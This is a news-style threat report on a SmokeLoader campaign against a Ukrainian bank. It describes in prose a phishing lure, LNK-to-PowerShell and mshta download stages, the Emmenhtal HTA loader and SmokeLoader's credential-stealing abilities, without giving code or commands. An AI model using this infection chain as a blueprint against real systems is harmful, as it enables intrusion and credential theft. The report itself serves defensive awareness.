SmokeLoader targets banking institutions in a new campaign

Threat actors have allegedly utilised the SmokeLoader malware in a recent cybercriminal operation that compromised one of the Ukrainian International Banks. Reports revealed that the malware chain in the campaign is highly complex and technically advanced.

The suspected malware is a well-known and powerful modular loader reinforced with covert execution tactics and a lesser-known but increasingly popular intermediary loader dubbed Emmenhtal Loader.

The investigation uncovers an improved infection method that uses multiple malicious tactics, such as social engineering, Living off the Land Binaries and Scripts (LOLBAS), and anti-analysis to silently deploy malware stages without raising alarms.

 

The alleged SmokeLoader malware attack against a Ukrainian banking institution begins with a phishing email.

 

According to researchers, the SmokeLoader malware attack starts with a phishing email that impersonates a payment confirmation with an attachment called Платiжна_iнстрyкция.7z.

The study emphasises the attackers’ continuous use of archive-based evasion techniques. In prior SmokeLoader campaigns, the threat actors leveraged a 7-Zip zero-day vulnerability to bypass security checks by employing double-archived files, which could eventually allow malware execution.

Although this newly discovered campaign does not leverage the same exploit, it still shows the malware operators’ continued use of archive-based evasion.

Furthermore, the [.]lnk file in the campaign starts a PowerShell script that uses Mshta, a genuine Windows binary for running HTML applications. It downloads a malicious—hta file and blends into native system operations to bypass detection.

To further obscure the operation, the attackers also adopt a modified DCCW.exe loader, injecting JavaScript into the program to run malicious payloads with a small footprint.

On the other hand, Emmenhtal, the loader stage, is hidden in a designed HTA file with a minimised window and no taskbar. JavaScript embedded in the loader calls eval(erc) to run more obfuscated code.

The script then decodes and opens a PowerShell downloader, which looks for two files, invoice1202.pdf and putty1202.exe, and either executes them or downloads new ones if they are missing.

Finally, the last stage releases SmokeLoader, a flexible malware that can deliver secondary payloads, steal browser and system credentials, inject into authorised processes, execute remote C2 servers, and implement anti-debugging and anti-analysis protections.

This increased use of [.]NET Reactor in current malware stealers shows a slow transition in malware tooling preferences as attackers seek improved evasion using commercial protections.